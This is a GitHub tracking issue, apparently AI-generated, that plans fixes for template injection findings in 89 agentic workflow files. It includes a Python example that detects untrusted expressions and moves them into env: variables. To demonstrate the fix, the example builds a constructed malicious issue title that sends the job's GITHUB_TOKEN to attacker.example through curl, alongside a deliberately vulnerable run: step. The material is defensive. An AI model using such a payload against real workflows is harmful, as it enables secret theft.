[plan] Fix Template Injection Vulnerabilities Identified in Static Analysis (2025-11-29) #5076
Closed
5 of 5 issues completed
Description
Overview
This tracking issue addresses the critical template injection vulnerabilities identified in the static analysis report from 2025-11-29.
Source: Discussion #5071
Problem Summary
The static analysis scan identified 361 template injection vulnerabilities affecting all 89 agentic workflow files. Each finding is a place where a GitHub Actions template expression (${{ ... }}) expands user-controlled data, such as an issue title or body, a pull request title or head branch name, or a comment body, directly into a run: script or another context where the runner treats the expanded text as code rather than data.
Risk: Because the expression is substituted into the script text before the shell starts, template injection could allow:
- Command injection through malicious input (a crafted title or comment that closes a quoted string and appends its own shell commands)
- Environment variable manipulation
- Potential secrets exfiltration, including the job's GITHUB_TOKEN and any secrets exposed to the step
Planned Tasks
This work is broken down into 5 focused sub-issues:
- Update workflow compiler - Modify the gh-aw compiler to generate secure code patterns: pass template expressions to steps through env: entries and reference them as quoted shell variables, instead of expanding them directly inside run: scripts
- Create automated recompilation script - Build tooling to systematically recompile all 89 workflows
- Test security fix on sample workflows - Validate the fix works correctly before mass deployment
- Deploy fixes to all workflows - Recompile all 89 workflows with the updated compiler
- Add static analysis to CI/CD - Integrate zizmor, actionlint, and poutine into the development pipeline to prevent regressions
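The following is an added example, not code from gh-aw or from the discussion this issue tracks. It shows, in Python, the two halves of the work above: a detector that flags template expressions in a run: script whose values an outside party controls, and the rewrite the compiler is meant to perform, moving every expression into env: and referencing it from the script as a quoted shell variable. A small render function mimics what the runner does before the shell starts, so the difference between the vulnerable and hardened step can be checked on a constructed malicious issue title. The list of untrusted contexts, the sample step, the payload and the attacker.example host are all constructed for this example; zizmor's own template-injection audit keeps the authoritative context list.

```python
"""Template injection in a run: step, and the env: rewrite that fixes it.

Example code, not the gh-aw compiler.  All inputs below are constructed.
"""
import re
from typing import Any

# Contexts an outside party can control.  Constructed, non-exhaustive list
# for this example; zizmor's template-injection audit holds the real one.
UNTRUSTED_CONTEXTS = (
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.pull_request.head.ref",
    "github.event.comment.body",
    "github.head_ref",
)

# A GitHub Actions expression: ${{ <expr> }}, inner whitespace optional.
EXPR_RE = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")


def find_untrusted_expressions(run_script: str) -> list[str]:
    """List expressions in a run: script whose value an attacker controls."""
    return [e for e in EXPR_RE.findall(run_script) if e.startswith(UNTRUSTED_CONTEXTS)]


def env_name(expr: str) -> str:
    """github.event.issue.title -> GITHUB_EVENT_ISSUE_TITLE."""
    return re.sub(r"[^A-Z0-9]", "_", expr.upper()).strip("_")


def harden_run_step(step: dict[str, Any]) -> dict[str, Any]:
    """Return a copy of a step with every ${{ }} in `run` moved into `env`.

    The runner then expands the expression into the process environment and
    the script reads it as a quoted variable, so attacker text is data, not code.
    """
    script = step["run"]
    env = dict(step.get("env", {}))

    def to_env_ref(m: re.Match) -> str:
        name = env_name(m.group(1))
        env[name] = "${{ " + m.group(1) + " }}"
        # Heuristic: an odd number of double quotes before the match means the
        # expression already sits inside a "..." string; do not add another pair.
        inside_dq = script[: m.start()].count('"') % 2 == 1
        return f"${name}" if inside_dq else f'"${name}"'

    hardened = dict(step)
    hardened["run"] = EXPR_RE.sub(to_env_ref, script)
    if env:
        hardened["env"] = env
    return hardened


def resolve(expr: str, ctx: dict[str, Any]) -> str:
    """Look up a dotted context path (github.event.issue.title) in an event."""
    cur: Any = ctx
    for part in expr.split("."):
        cur = cur[part]
    return str(cur)


def render(step: dict[str, Any], ctx: dict[str, Any]) -> tuple[str, dict[str, str]]:
    """Mimic the runner: expand ${{ }} in `run` and `env` before the shell starts."""
    def expand(s: str) -> str:
        return EXPR_RE.sub(lambda m: resolve(m.group(1), ctx), s)
    run = expand(step["run"])
    env = {k: expand(v) for k, v in step.get("env", {}).items()}
    return run, env


# Constructed sample: a step as an unpatched compiler might emit it.
VULNERABLE_STEP = {
    "name": "Summarize issue",
    "run": 'echo "Processing issue: ${{ github.event.issue.title }}"\n'
           "gh issue view ${{ github.event.issue.number }} --json body\n",
}

# Constructed malicious event: the title closes the quoted string and
# appends a command that would send the job's token to an attacker host.
PAYLOAD = 'Fix login"; curl https://attacker.example/?t=$GITHUB_TOKEN; echo "'
EVENT = {"github": {"event": {"issue": {"title": PAYLOAD, "number": 5076}}}}

if __name__ == "__main__":
    print("untrusted expressions:", find_untrusted_expressions(VULNERABLE_STEP["run"]))
    run, _ = render(VULNERABLE_STEP, EVENT)
    print("vulnerable script handed to the shell:\n" + run)
    safe = harden_run_step(VULNERABLE_STEP)
    run, env = render(safe, EVENT)
    print("hardened script:\n" + run)
    print("hardened env:", env)
```

Running the script prints the vulnerable step's script with the curl command spliced into it as shell syntax, then the hardened step, whose script text never changes and whose environment holds the payload as an inert string. The quote-counting heuristic ignores escaped quotes and single-quoted strings; a real compiler should track shell quoting properly or move the whole script into a file and pass values only through the environment.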
Acceptance Criteria
- All 89 recompiled workflows pass a zizmor scan with no High severity template injection findings
- Workflows maintain existing functionality after recompilation
- Static analysis tools integrated into CI/CD pipeline
- Documentation updated with secure coding patterns
Reference
- Static Analysis Report: Discussion Static Analysis Report - 2025-11-29 #5071
- Zizmor Template Injection Documentation: (redacted)
AI generated by Plan Command for discussion #5071